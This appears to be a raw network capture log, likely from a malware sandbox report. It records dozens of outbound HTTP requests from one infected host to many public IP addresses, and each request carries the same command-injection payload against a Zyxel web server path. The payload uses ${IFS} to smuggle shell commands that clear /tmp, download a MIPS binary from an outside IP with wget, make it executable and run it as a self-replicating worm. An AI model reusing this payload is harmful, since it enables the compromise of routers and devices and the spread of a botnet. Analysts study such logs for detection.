                                          Jan 14, 2024 15:46:28.268908978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7181192.168.2.2338020212.207.208.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268945932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7182192.168.2.2347536212.134.62.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268963099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7183192.168.2.2341334209.183.35.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269021034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7184192.168.2.235685895.221.195.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269032001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7185192.168.2.2342838223.74.94.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269059896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7186192.168.2.234848288.141.189.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269063950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7187192.168.2.235921245.3.79.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269100904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7188192.168.2.2358244176.252.120.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269162893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7189192.168.2.2350184124.245.137.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269166946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7190192.168.2.2339800177.52.105.15443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269202948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7191192.168.2.235210683.122.148.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269248962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7192192.168.2.2344102157.38.250.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269263983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7193192.168.2.2347034165.119.219.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269304037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7194192.168.2.2352042138.101.164.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269340992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7195192.168.2.2360418101.173.47.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269349098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7196192.168.2.234441249.105.255.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269360065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7197192.168.2.236040065.244.217.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269381046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7198192.168.2.233599878.113.142.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269414902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7199192.168.2.234329244.233.169.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269447088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7200192.168.2.2352232116.218.159.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269478083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7201192.168.2.233822459.16.50.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269510984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7202192.168.2.2347878186.144.132.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269519091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7203192.168.2.234366820.52.104.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269553900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7204192.168.2.235868477.104.61.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269560099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7205192.168.2.235808243.116.237.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269610882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7206192.168.2.235593419.6.251.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269645929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7207192.168.2.2346606133.62.109.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269653082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7208192.168.2.2356484121.194.109.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269716024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7209192.168.2.235960293.160.17.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269743919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7210192.168.2.2355762162.77.91.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269768953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7211192.168.2.2336476124.118.183.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269774914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7212192.168.2.2344646122.87.116.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269813061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7213192.168.2.2347702195.74.148.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269830942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7214192.168.2.2336362166.121.181.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269850016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7215192.168.2.235669461.204.158.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269855976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7216192.168.2.2345350120.228.118.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269896984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7217192.168.2.2353046204.192.10.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269948006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7218192.168.2.234518836.167.147.72443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.269973040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7219192.168.2.235688032.234.142.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270004034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7220192.168.2.235310214.205.37.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270049095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7221192.168.2.233332878.192.75.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270076036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7222192.168.2.2360388102.64.144.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270117998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7223192.168.2.2355140211.142.134.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270158052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7224192.168.2.2347824122.252.222.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270170927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7225192.168.2.233845491.156.39.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270184994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7226192.168.2.2342604204.72.242.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270240068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7227192.168.2.233438613.30.202.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270272017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7228192.168.2.235757475.128.42.87443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270315886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7229192.168.2.234323898.155.115.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270335913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7230192.168.2.235247285.69.235.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270370007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7231192.168.2.2341226154.93.107.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270394087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7232192.168.2.2333950103.171.107.160443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270426035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7233192.168.2.2335010187.232.128.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270452976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7234192.168.2.2346166172.139.226.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270487070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7235192.168.2.2349594169.147.146.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270513058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7236192.168.2.2345014205.247.179.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270540953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7237192.168.2.234542679.91.77.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270592928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7238192.168.2.2350246180.246.120.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270608902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7239192.168.2.235040492.221.18.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270664930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7240192.168.2.2332958112.197.62.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270675898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7241192.168.2.233561876.80.8.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270700932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7242192.168.2.2346504173.150.251.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270736933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7243192.168.2.233472681.143.51.165443
                                          TimestampBytes transferredDirectionData
